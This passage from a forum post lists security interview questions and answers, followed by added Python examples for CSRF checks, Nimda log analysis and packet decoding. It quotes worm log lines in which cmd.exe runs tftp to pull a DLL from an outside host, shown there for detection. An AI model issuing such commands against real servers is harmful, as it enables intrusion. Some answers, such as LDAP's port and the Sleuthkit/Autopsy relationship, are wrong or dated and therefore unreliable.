Latest posts for the topic "Security Interview Questions"

Security Interview Questions

http://foo.com/logout/. A victim just loading that page could potentially get logged out from foo.com, and their browser would have made the action, not them (since browsers load all IMG tags automatically).

How does one defend against CSRF?
Logging out of sites and avoiding their "remember me" features can mitigate CSRF risk; not displaying external images or clicking links in "spam" or untrusted e-mails may also help.
· Requiring authentication in GET and POST parameters, not only cookies;
· Checking the HTTP Referer header;
· Ensuring there's no crossdomain.xml file granting unintended access to Flash movies; and
· Limiting the lifetime of authentication cookies

What kind of network (lab) do you have at home?
I've yet to meet a serious security guy who doesn't have a considerable home lab or network.

As a corporate Information Security professional, what's more important to focus on: threats or vulnerabilities?
Opinion-based, but the correct answer should be vulnerabilities, as this is what we can control in a corporate environment; we have little control over the threats.

What's the difference between a risk and a vulnerability?
If a CISSP gets this wrong, move along. Risk is dependent on a vulnerability, whereas a vulnerability is a weakness and risk is the threat of an action or event.

What is a Buffer Overflow?
An anomaly where a process stores data in a buffer outside the memory the programmer set aside for it.

What is a NOP Sled?
A sequence of NOP (no-operation) instructions (on x86, opcode 0x90) meant to "slide" the CPU's instruction execution flow to its final, desired destination.

Someone wants to test out a new product that works on a wireless network; how would you advise them to test out the product?
This will give you a really good idea of how well wireless security is known by the candidate, as well as how much they are willing to work with the business to test the new product. If they come up with a clean, segregated network to test on that does not touch the main corporate network, or links to the internet in a DMZ-type situation, that is promising. If they ask for a Faraday cage, you might not have a winner here.

A business team has developed this brand new web site that you just tested and found a number of XSS errors in; how would you handle that?
This will let the interviewer know if the candidate has any idea about web security and development. If they offer to work with the developers to solve the issue you have a good candidate; if the candidate says it is the developer's problem, and that they cannot help them or the business, then this might not be the candidate for you.

Ask the candidate to "Design a secure network".
This is meant to see how the candidate thinks; you can add something like "design a secure network between two offices that is also optimized or has QoS for various protocols". Ask how they would securely link two offices together.
· Protocol stack
· VPN solutions
· You might want to include trusted partners.

What is your Blog URL?
If they have a blog then you need to know what they blog about; if they blog about tech that means they live, eat and breathe this stuff, and that is good. If they are slamming their co-workers, families, friends, or in general how they pulled one over on someone, this might not be the person for you.

What is your MySpace page?
You have to ask this one for the same reason that you ask what their blog URL is: do they meet the needs of the company? I tend to dismiss the use of MySpace as something that I wouldn't want to have, or to know someone that uses it, but that's my opinion.

What papers have you written?
The answer to this is the same as the blog; if they don't blog, and they don't write, then ask them what they are reading in the news. Are they staying up on the technology? If not, you might not have a winner here.

What is the secret sauce to a Cisco command?
This will let you know if they have any hands-on with a Cisco device at all; this can be important depending on what the security engineer will be doing. BTW, the answer is TAB.

What do you think of Teams?
This is the ultimate people question; if they say they like teams, ask them why. If they say they like people, ask them why: what is it that drives their relationships with others? This opens up a whole line of questioning about how well they like people, how well they can train others, and their viewpoints on working with others. You really do want a social person, or at least a person sociable enough for the company.

What is the security threat level today at the Internet Storm Center (ISC)?
You should know that it's almost always Green. Are they in touch with the current situation?

Ask them what their favorite security web sites are.
You should at least hear one you already read; if not, check them out (write them down) and see what they are like. Are they deep geek techno security, or are they fluff, Fox News kind of stuff?

Hand them a security scan of a network and ask them to interpret it.
This is always good to see if they know what they are looking at, and can derive information from it.

Hand them a web site security scan and ask them to interpret it.
This is always good to see if they know what they are looking at, and can derive information from it.

Show them a security policy from the company, and ask how they would enforce it.
This is always good; you find out what kind of leader they are. Do they intend on teaching and enforcement, or do they go right to punitive damages?

Show them a hack attack against something, down to the packet level, and ask what they would do.
You have to hand them the entire attack, not just snippets of info. Find out what they know and whether they can interpret information well enough to be of use to the employer.

What is their dream information security job?
This is always good to find out how ambitious they are, where they see themselves in a while, and to determine if there is a good fit between the job and the candidate.

Ask them to explain SOX, HIPAA, PCI and GLB (if applicable).

What do you see as the most critical and current threats affecting Internet accessible websites?
Goal of question is to gauge the applicant's knowledge of current web related threats. Topics such as Denial of Service, Brute Force, Buffer Overflows, and Input Validation are all relevant topics. Hopefully they will mention information provided by web security organizations such as the Web Application Security Consortium (WASC) or the Open Web Application Security Project (OWASP).

What do you see as challenges to successfully deploying/monitoring web intrusion detection?
You are attempting to see if the applicant has a wide knowledge of web security monitoring and IDS issues such as:
· Limitations of NIDS for web monitoring (SSL, semantic issues with understanding HTTP)
· Proper logging, increasing the verboseness of logging (Mod_Security audit_log)
· Remote Centralized Logging
· Alerting Mechanisms
· Updating Signatures/Policies

What are the most important steps you would recommend for securing a new web server?
There is no right or wrong answer. However, the following are good starting points:
· Update/Patch the web server software
· Minimize the server functionality, disable extra modules
· Delete default data/scripts
· Increase logging verboseness
· Update Permissions/Ownership of files

What are the most important steps you would recommend for securing a new Web application?
· Make sure Input Validation is enforced within the code – Security QA testing
· Ensure the application is configured to display generic error messages
· Implement a software security policy
· Remove or protect hidden files and directories

Imagine that we are running an Apache reverse proxy server and one of the servers we are proxying for is a Windows IIS server. What does the log entry suggest has happened? What would you do in response to this entry?

68.48.142.117 - - [09/Mar/2004:22:22:57 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 566 "-" "-"
68.48.142.117 - - [09/Mar/2004:22:23:48 -0500] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-%2068.48.142.117%20GET%20cool.dll%20c:\\httpodbc.dll HTTP/1.0" 200 566 "-" "-"

You will know if the applicant is fluent at reading web server log files in the Common Log Format (CLF). In this scenario, the client system (68.48.142.117) is infected with the Nimda worm. These requests will not affect our Apache proxy server since this is a Microsoft vulnerability. While it does not impact Apache, the logs do indicate that the initial request was successful (status code of 200). The Nimda worm will only send the level 2 request (trying to use Trivial FTP to infect the target) if the initial request is successful. Depending on the exact proxying rules in place, it would be a good idea to inspect the internal IIS server to verify that it has not been compromised.

What is SSL?
SSL is a cryptographic protocol that provides security and data integrity for communications over networks such as the Internet. TLS and SSL encrypt the segments of network connections at the Transport Layer end-to-end.

How do you create SSL certificates, generically speaking?
To create a certificate, you generate a private key, generate a Certificate Signing Request, then generate and install the Certificate.

What is DNS Hijacking?
DNS hijacking is the practice of hijacking the resolution of DNS names to IP addresses by the use of rogue DNS servers, particularly for the practice of phishing.

What are IDA and/or Olly?
Debuggers.

Have you hacked any system?
This is a unique question in that for some companies the answer should always be "NO", as many companies have a hire-no-hacker policy. If they start answering by indicating a legal or ethical engagement, then you might want to delve into this a little more.

Have you released any worm/trojan/malicious code in the wild?
Most definitely this answer should always be "NO."

If I give you two DLLs of different versions, one has the vulnerability and another is patched for that vulnerability, then how will you find the vulnerability?
· Load them up in a debugger to determine which is which.
· Validate the vulnerability by Googling, Microsoft, Secunia, etc.

What is the latest security breach you're aware of?
· The goal is to gauge if the candidate is up on data breach disclosure.

Can a Virtual Operating System be compromised?
· The obvious answer is yes, so mix it up with a follow-up about the Host operating system being compromised from a guest. If they have no idea what a guest or host is then they don't understand Virtualization security.

What sort of test would you perform to understand a virus?
· The idea here is to see if the candidate has an understanding of using a sandbox or external website for virus analysis.

What is UPX?
· The Ultimate Packer for eXecutables is a free and open source executable packer supporting a number of file formats from different operating systems.

What is meterpreter?
· Meterpreter is a command line program that extends the functionality of Metasploit.

What is LDAP?
· LDAP (Lightweight Directory Access Protocol) is a protocol for communications between LDAP servers and LDAP clients. LDAP servers store "directories" which are accessed by LDAP clients.

Why is LDAP called lightweight?
· LDAP is called lightweight because it is a smaller and easier protocol which was derived from the X.500 DAP (Directory Access Protocol) defined in the OSI network protocol stack.

What are the standard port numbers for SMTP, POP3, IMAP4, RPC, LDAP and Global Catalog?
· The standard port numbers are respectively SMTP 25, POP3 110, IMAP4 143, RPC 135, LDAP 636, GLOBAL CATALOG 3269

How will you determine if a file is packed or not?
· There are numerous tools available to determine what packed a file: PEiD is a common tool that detects a large number of packers.
· File Checksum Checking Services
· Cumulative Anti Virus Testing: VirusTotal, NoVirusThanks, ThreatExpert, and Jotti

Do you have Rainbow tables?
This may or may not be of importance, but if you're looking for a true pentester, the answer had better be yes.

What is dsniff?
This is a good question to determine what they know about network auditing and penetration testing tools.

Have you ever used FTK, EnCase, dc3dd, dd_rescue or dcfldd?
This is used to determine if the candidate has any forensics experience.

Other than Wireshark, what sniffers have you used?
Here we're looking for tcpdump, or something commercial.

Tell me what you know about Sleuthkit.
Sleuthkit is an open source disk analysis/forensics frontend for Autopsy.

With regard to forensics, what is physically different about how the platters are used in a 3.5" and a 2.5" HDD?
The platters are written outside to inside on a 3.5" drive, whereas the inside (closest to the spindle) is written first on a 2.5" drive.

What are DCO and HPA?
DCO is Device Configuration Overlay and HPA is Host Protected Area. These are areas on a hard drive that are designed to store information in such a way that it cannot be easily modified, changed or accessed by the user, BIOS or OS.

Can DCO and HPA be changed?
There is a tool called TAFT that can do this by talking directly to the ATA controller. There are numerous tools to remove HPA and DCO.
Describe a time when you implemented defense in depth.
The goal here is to get the candidate to talk about multiple layers of security, like an onion.

What was the last course you attended? Where? When? Why?
Has the candidate attended any training recently?

Describe the last security implementation you were involved with.
The goal here is to get the candidate to talk about their involvement with the implementation of a security product, initiative or design.

Design a RADIUS infrastructure for 802.11 security and authentication.
Goal of question here is to gauge the applicant's knowledge of RADIUS. Do they use Realms?

What was the last technical book you read?
Goal of question here is to gauge the applicant's desire to gain knowledge outside of work.

What is your CISSP number?
Check the status of the candidate's certification.

How would you decode the following packet in HEX?
4500 0036 308b 0000 4001 0000 7f00 0001 7f00 0001 0800 89f3 5a27 0200 3173 7432 444d 6d65 6765 7473 4153 7461 7262 7563 6b73 6361 7264
· Convert this from text to pcap using text2pcap, then open it in Wireshark.

What is a honeypot?
A honeypot is simply a system, program or file that has absolutely no purpose in production. Therefore, we can always assume that if the honeypot is accessed, it is for some reason unrelated to your organization's purpose.

Are there limitations of Intrusion Detection Signatures?
Signature based IDS provide a useful service to let an administrator know that he/she has been or is being attacked, but they should not be relied upon. It is far too easy to fool or shut down an IDS machine for them to be utilized as the primary line of defense against intruders.

What was ISO 17799 originally called?
BS 7799

What areas do ISO 27001 and 27002 cover?
ISO 27001 covers the requirements for Information security management systems. ISO 27002 covers the actual practice for information security management.

Define an incident.
This is really a question that is intended to elicit the amount of knowledge as well as the ability to think quickly. Candidates should say something similar to: an event that could or actually does have an adverse effect on a company, department, or system. A good follow-up is to ask for an example of an incident that they were involved with and how they handled it.

What is the difference between Encrypting and Encoding?
In the simplest terms, it's the lack of a key.

What can protect you 100% from attack?
If the candidate says any of the following you need to end the interview: Firewalls, AV, IDS/IPS, Encryption, policies. The point is there isn't anything that can protect you 100% of the time.

/hvaonline/posts/list/38130.html#234168
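The CSRF defences listed near the top of the post ("require authentication in GET and POST parameters, not only cookies" and "check the HTTP Referer header") are easier to evaluate in an interview with a concrete check in hand. The following is an added example, not code from the original post: it derives a per-session anti-CSRF token as an HMAC over the session id, rejects state changes that arrive as GET (which is all an `<img>` tag can issue), requires the token in the request body, and then checks the Origin or Referer header against an assumed site origin of `https://foo.com`. The request shape (`method`, `cookies`, `params`, `headers`) and the sample requests are constructed for the example.

```python
"""CSRF defence: per-session synchronizer token plus Origin/Referer check.

Added example, not part of the original post. Requests are modelled as
plain dicts; the framework wiring and the site origin are assumptions.
"""
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

SITE_ORIGIN = "https://foo.com"  # assumed origin of the application

# Server-side secret that binds tokens to sessions. Generated at start-up
# here; a real deployment would load it from configuration.
_TOKEN_SECRET = secrets.token_bytes(32)


def csrf_token_for(session_id: str) -> str:
    """Anti-CSRF token for a session: HMAC-SHA256 over the session id.

    Because it is a keyed MAC, an attacker cannot compute it from the
    cookie value alone, and the server never has to store it.
    """
    return hmac.new(_TOKEN_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def _source_allowed(headers: dict) -> bool:
    """True only if Origin (preferred) or Referer names our own origin.

    A request with neither header is refused for state changes; browsers
    send at least one of them on a cross-site form post.
    """
    origin = headers.get("Origin")
    if origin is not None:
        return origin == SITE_ORIGIN
    referer = headers.get("Referer")
    if referer:
        parts = urlsplit(referer)
        return f"{parts.scheme}://{parts.netloc}" == SITE_ORIGIN
    return False


def is_state_change_allowed(request: dict) -> bool:
    """Decide whether a state-changing request (logout, transfer, ...) may run.

    request = {"method": str, "cookies": dict, "params": dict, "headers": dict}
    """
    if request["method"] != "POST":
        return False                      # <img src=...> can only issue GET
    session_id = request["cookies"].get("session")
    if not session_id:
        return False                      # not authenticated at all
    supplied = request["params"].get("csrf_token", "")
    expected = csrf_token_for(session_id)
    if not hmac.compare_digest(supplied, expected):
        return False                      # the cookie alone is not enough
    return _source_allowed(request["headers"])


def demo() -> dict:
    """Constructed requests: a forged <img>, a cross-site form, a real submit."""
    sid = "victim-session-123"
    forged_img = {                        # <img src="https://foo.com/logout/">
        "method": "GET", "cookies": {"session": sid}, "params": {},
        "headers": {"Referer": "https://evil.example/"},
    }
    forged_form = {                       # auto-submitted cross-site POST form
        "method": "POST", "cookies": {"session": sid}, "params": {},
        "headers": {"Origin": "https://evil.example"},
    }
    legit = {
        "method": "POST", "cookies": {"session": sid},
        "params": {"csrf_token": csrf_token_for(sid)},
        "headers": {"Origin": SITE_ORIGIN},
    }
    return {
        "forged_img": is_state_change_allowed(forged_img),
        "forged_form": is_state_change_allowed(forged_form),
        "legit": is_state_change_allowed(legit),
    }


if __name__ == "__main__":
    print(demo())
```

Two caveats a candidate should raise: the Referer check alone is weak because privacy tools and some proxies strip the header, which is why Origin is consulted first and the token is the primary control; and a token derived only from the session id is constant for the life of the session, so pair it with the post's last point (short cookie lifetimes) or rotate it on login.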
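The Apache reverse-proxy question in the post expects the candidate to read the two Common Log Format lines, recognise the `cmd.exe` probe, notice the 200, and tie the second `tftp` request to the first one succeeding. The block below is an added example, not part of the original post or of any tool: it parses CLF with a regex, URL-decodes the request path so `%20`-encoded variants match the same rules, labels each hit as the stage-1 probe or the stage-2 tftp fetch, and lists the clients whose stage-2 request was answered with a 200, which is the "go inspect the IIS box" signal the answer describes. The two log lines are reconstructed from the question; the third benign line is constructed for contrast.

```python
"""Spot Nimda-style cmd.exe probes in Apache Common Log Format lines.

Added example, not part of the original post. The first two log lines are
reconstructed from the interview question; the third is a constructed
benign request. The regex and staging logic are this example's own.
"""
import re
from typing import Optional
from urllib.parse import unquote

# CLF: host ident authuser [time] "method path proto" status bytes ...
CLF_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

SAMPLE_LOG = r'''68.48.142.117 - - [09/Mar/2004:22:22:57 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 566 "-" "-"
68.48.142.117 - - [09/Mar/2004:22:23:48 -0500] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-%2068.48.142.117%20GET%20cool.dll%20c:\\httpodbc.dll HTTP/1.0" 200 566 "-" "-"
10.0.0.5 - - [09/Mar/2004:22:24:00 -0500] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
'''


def parse_clf(line: str) -> Optional[dict]:
    """Parse one CLF line into a dict, or return None if it is not CLF."""
    m = CLF_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    # Decode %xx so encoded variants match the same substring rules below
    rec["decoded_path"] = unquote(rec["path"])
    return rec


def classify(rec: dict) -> Optional[str]:
    """Label a parsed request as a Nimda-style probe stage, or None if benign."""
    p = rec["decoded_path"].lower()
    if "cmd.exe" not in p and "root.exe" not in p:
        return None
    # Stage 2 is the tftp fetch the worm only sends after a successful probe
    return "stage2-tftp-upload" if "tftp" in p else "stage1-cmd-probe"


def analyse(log_text: str) -> list:
    """Return one finding per suspicious line, with the decoded shell command."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_clf(line)
        if rec is None:
            continue
        stage = classify(rec)
        if stage is None:
            continue
        findings.append({
            "host": rec["host"],
            "stage": stage,
            "status": rec["status"],
            # everything after "?/c+" is what would run under cmd.exe
            "command": rec["decoded_path"].split("?/c+", 1)[-1],
        })
    return findings


def hosts_needing_backend_check(findings: list) -> set:
    """Clients whose stage-2 request got a 200: verify the proxied IIS server."""
    return {f["host"] for f in findings
            if f["stage"] == "stage2-tftp-upload" and f["status"] == 200}


if __name__ == "__main__":
    results = analyse(SAMPLE_LOG)
    for f in results:
        print(f)
    print("inspect backend for:", hosts_needing_backend_check(results))
```

The 200 on its own is not proof of compromise, since a catch-all proxy rule or a custom error page can also return it, which is why the answer in the post says to inspect the IIS server rather than assume the worst; the stage-2 line is still the one to escalate on, because the worm only sends it after the probe looked successful.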
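For the "decode this packet in HEX" question, the post's answer is to run the dump through text2pcap and open it in Wireshark. As an added example (not from the original post), the block below decodes the same 54 bytes directly with `struct`, which is what a candidate has to be able to do by eye anyway: it splits the IPv4 header, verifies the total length, recomputes both the IP header checksum and the ICMP checksum with the RFC 1071 ones-complement sum, and pulls out the ICMP echo-request fields and ASCII payload. The hex string is the one from the question; the decoding logic is this example's own.

```python
"""Decode the interview hex dump (IPv4 + ICMP) without text2pcap/Wireshark.

Added example, not part of the original post. The hex string is the one
from the question; parsing and checksum code are this example's own.
"""
import ipaddress
import struct

HEX_DUMP = (
    "4500 0036 308b 0000 4001 0000 7f00 0001 7f00 0001 "
    "0800 89f3 5a27 0200 3173 7432 444d 6d65 6765 7473 "
    "4153 7461 7262 7563 6b73 6361 7264"
)


def inet_checksum(data: bytes) -> int:
    """RFC 1071 ones-complement checksum over 16-bit words.

    Computed over a buffer that already carries a correct checksum it
    returns 0; computed with the checksum field zeroed it returns the
    value that should be stored there.
    """
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:                     # fold carries back in
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def decode_packet(hex_dump: str) -> dict:
    """Parse an IPv4 packet (and its ICMP message, if any) from a hex dump."""
    raw = bytes.fromhex(hex_dump.replace(" ", ""))
    (ver_ihl, _tos, total_len, ident, flags_frag, ttl, proto,
     hdr_csum, src, dst) = struct.unpack("!BBHHHBBH4s4s", raw[:20])
    version, ihl = ver_ihl >> 4, (ver_ihl & 0x0F) * 4
    ip = {
        "version": version,
        "header_len": ihl,
        "total_len": total_len,
        "id": ident,
        "flags": flags_frag >> 13,
        "frag_offset": flags_frag & 0x1FFF,
        "ttl": ttl,
        "protocol": proto,                 # 1 = ICMP
        "src": str(ipaddress.IPv4Address(src)),
        "dst": str(ipaddress.IPv4Address(dst)),
        "header_checksum": hdr_csum,
        # A stored 0 is what a hand-crafted packet looks like; Wireshark
        # would flag it unless checksum validation is turned off.
        "header_checksum_ok": inet_checksum(raw[:ihl]) == 0,
    }
    result = {"ip": ip, "length_matches": len(raw) == total_len}
    if proto == 1:
        icmp = raw[ihl:total_len]
        typ, code, csum, icmp_id, seq = struct.unpack("!BBHHH", icmp[:8])
        result["icmp"] = {
            "type": typ,                   # 8 = echo request, 0 = echo reply
            "code": code,
            "checksum": csum,
            "checksum_ok": inet_checksum(icmp) == 0,
            "id": icmp_id,
            "seq": seq,
            "payload": icmp[8:].decode("ascii", errors="replace"),
        }
    return result


def summarize(decoded: dict) -> str:
    """One-line description in the style a candidate would give out loud."""
    ip = decoded["ip"]
    line = f"IPv{ip['version']} {ip['src']} -> {ip['dst']} ttl={ip['ttl']} proto={ip['protocol']}"
    if "icmp" in decoded:
        i = decoded["icmp"]
        kind = {8: "echo request", 0: "echo reply"}.get(i["type"], f"type {i['type']}")
        line += f", ICMP {kind} id={i['id']} seq={i['seq']} payload={i['payload']!r}"
    return line


if __name__ == "__main__":
    d = decode_packet(HEX_DUMP)
    print(summarize(d))
    print("IP checksum ok:", d["ip"]["header_checksum_ok"],
          "ICMP checksum ok:", d["icmp"]["checksum_ok"])
```

What the dump decodes to is a loopback ICMP echo request (127.0.0.1 to 127.0.0.1, TTL 64) whose ICMP checksum verifies while the IP header checksum is left at zero, so it was almost certainly generated by a tool rather than captured off the wire; a candidate who spots the unset header checksum and reads the payload string is doing the analysis the question is after.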